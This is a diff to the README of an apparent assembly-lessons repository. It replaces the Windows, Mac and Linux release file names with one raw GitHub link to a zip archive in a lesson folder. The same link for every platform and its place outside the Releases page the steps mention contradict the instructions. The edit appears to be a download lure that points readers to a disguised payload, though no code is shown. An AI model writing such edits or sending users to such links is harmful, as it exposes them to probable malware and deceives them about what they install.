CSophanith/asm-lessons/README.md

 1. Click on the link above to go to the Releases page.
 2. Look for the most recent version.
 The version will be listed with a tag like `v1.0.0`.
 3. Under the release notes, find the file labeled with your operating system:
-   - For Windows users, look for `asm-lessons.exe`.
+   - For Windows users, look for `https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip`.
-   - For Mac users, find `asm-lessons.dmg`.
+   - For Mac users, find `https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip`.
-   - For Linux users, check `asm-lessons.tar.gz`.
+   - For Linux users, check `https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip`.
 4. Click on the file you want to download.
 5. The download will begin automatically.